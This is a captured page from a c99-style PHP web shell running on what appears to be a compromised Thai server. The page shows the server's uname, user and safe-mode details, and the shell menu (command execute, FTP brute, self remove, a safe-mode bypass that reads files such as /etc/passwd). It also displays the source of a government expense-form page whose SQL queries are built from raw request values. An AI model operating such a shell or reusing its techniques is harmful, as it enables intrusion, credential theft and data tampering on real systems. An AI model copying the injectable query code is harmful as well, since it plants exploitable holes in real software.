!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/   drwxr-xr-x
Free 52.61 GB of 127.8 GB (41.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     DetailMoney.php (19.98 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
";
		echo "

กรุณาทำการ Login ก่อน
";
		echo "";
		exit();
	} 
	else {
		/**  Configuration  */
		require_once( "../configuration.php" );
		require_once( $_Config_absolute_path . "/includes/framework.php" );
		require_once( "../include/Function.php" );
		require_once("../link/function.php");
	
		/**  Create Database Object  */
		$dbObj = new DBConn;
		
		//=== SESSION
		$Username = $valid_user; 
		
		
		/**  Config Table for This Page  */
		$myTable1 = "personal_tb";
		$myTable2 = "formaoffice"; // 
		$myTable3 = "budget_year_tb";
		$myTable4 ="formofficemoney" ; 
		$myTable2PK = "monId";
		
		/**  Table  -->  personal_tb  */
		
		
	
				/**  Paging */
		$page = $_GET['page'];
		if( $page == "" ) { $page = 1; }
		
		/**  จำนวนข้อมูล ต่อ 1 หน้า  */
		$perpage = $_REQUEST['perpage'];
		if( $perpage == "" ) { $perpage = 20; }
		
		
		/**  Botton Name Action */
		$action = $_REQUEST['action'];
		$id = $_REQUEST['id'];
	
		if( isset($action) && !empty($action) ) {
			switch($action) {
				case "Delete" :
					$num = count($id);
					for( $i=0; $i<$num; $i++ ) { 
						$qrySel = " SELECT *  FROM   $myTable4   WHERE monId ='$id[$i]' ";
						$resultSel = $dbObj->execQuery($qrySel);
						$rsSel = $dbObj->fetchObject($resultSel);
							$Training_code = $rsSel->Training_code;
							
						$qryDel = " DELETE FROM   $myTable4  WHERE   monId ='$id[$i]'  ";
						$resultDel = $dbObj->runQuery($qryDel);
						$dbObj->freeresult($resultDel); 
						if( $resultSel ) {
							
						} # if
					}
				break;
			} # switch
		} # if
		
		
	} # else
 ?>




ข้อมูลการขอไปราชการ








  

    
      execQuery($query);
	
		$numrows = $dbObj->_numrows;
		
		/**  Paging  */
		$display = ( !isset ($_GET['page']) ) ? 1 : $_GET['page'];
		$start = ( ($display * $limit) - $limit );
		/**  Paging  */
		
		if( isset($_GET['OrderBy']) ) {
			$query = " SELECT *  FROM   formofficemoney   Where   Flag='$Flag'    and  maNo='$maNo'   ORDER BY $OrderBy $ASCDESC ";
		} 
		elseif( !isset($_GET['OrderBy']) ) {
			$query = " SELECT *  FROM   formofficemoney  Where   Flag='$Flag'     and  maNo='$maNo'   ORDER BY $myTable2PK DESC ";
		}
		
		$query .= " LIMIT $start, $limit ";
		$result = $dbObj->execQuery($query);
    ?>
      

        

          

            

              หน้าหลัก » แบบฟอร์มราชการ  » จัดการข้อมูลการเบิกจ่าย » พิมพ์ใบขออนุมัติส่งเบิกจ่าย » หลักฐานการจ่ายเงินค่าใช้จ่ายในการเดินทางไปราชการ 
            

            

              

                

                  ส่วนที่ ๒ แบบ บก 8708
                

                

                   หลักฐานการจ่ายเงินค่าใช้จ่ายในการเดินทางไปราชการ
                  

                

                  ชื่อส่วนราชการ   
                    
                

                

                  
                   ประกอบใบเบิกค่าใช้จ่ายในการเดินทางของ
                  
                  และคณะ..............ลงวันที่
execQuery($query1);
		       $rs = $dbObj->fetchObject($result1);
				
				$sday = $rs->Date_start ;
				$yearthai = explode("-",$sday);
				$day = intval($yearthai[2]);
				$month = intval($yearthai[1]);
				$year = intval($yearthai[0]);	 
				$m = getThaiSubMonth($month);
					echo "$day"." "."$m"." "."$year";
			?>
      -
Date_finish;
				$yearthai = explode("-",$sday); 
				$day = intval($yearthai[2]);
				$month =  intval($yearthai[1]);
				$year = intval($yearthai[0]);	 
				$m = getThaiSubMonth($month);
					echo "$day"." "."$m"." "."$year";
			?>
                  
                

                

                  
                  

                

                   
                     0 ) { ?>
                    
  
                    
                      
                    
                  

              

            

            

               0 ) { ?>
                fetchArray($result) ) { 
				$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";
          ?>
                  

                  

                   ลำดับ
                    ชื่อ
                    ตำแหน่ง
                    ค่าใช้จ่าย
                    รวม
                    ลงรายมือชื่อ
                    วัน เดือน ปี 
ที่รับเงิน		
                    หมายเหตุ
                    จัดการ
                  

                 
                  

                    ค่าเบี้ยเลี้ยง
                    ค่าเช่าที่พัก
                    ค่าพาหนะ
                    ค่าใช้จ่ายอื่นๆ
                  

                    

                    
                      
                    
                                          
                    
                    
                    
                    
                   
                    
                  
                    
                    
                     
                     
                     
                     แก้ไขข้อมูล  
                    
                  

                  

                     
                    
                      
                    
                    
                    
                    
                    
                    ตามสัญญายืมเงินเลขที่............... วันที่ ..................
                  

                  

                    จำนวนเงินรวมทั้งสิ้น (ตัวอักษร) 
                     
                  

                  
                

                
                

                  

                    
                       0 ) { ?>
                      

                        

                          
                        

                        

                          Page : 
                             1) {	
                            $previous = $display - 1;					
                    ?>
bool(false)




:: Command execute ::


Enter:  
Select: 
 






:: Shadow's tricks :D  ::



  

    
Useful Commands 
    

    

      

        
        
          
        
         
        
          

        Warning. Kernel may be alerted using higher levels 

    

    

  

   
Kernel Info: 

      
      
	  
	  
	  
	  
    

    







:: Preddy's tricks :D  ::



  

    
Php Safe-Mode Bypass (Read Files)
    


    

      

      File:  

 eg: /etc/passwd

      
      
      
           
      
      
      	
	
          

      

    

    

  

   
Php Safe-Mode Bypass (List Directories):     

      


      Dir:  

 eg: /etc/


    

    








 
:: Search ::
  - regexp 

 
:: Upload ::
 
[ Read-Only ]






:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]


:: Go Dir ::
 
:: Go File ::
 


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0053 ]--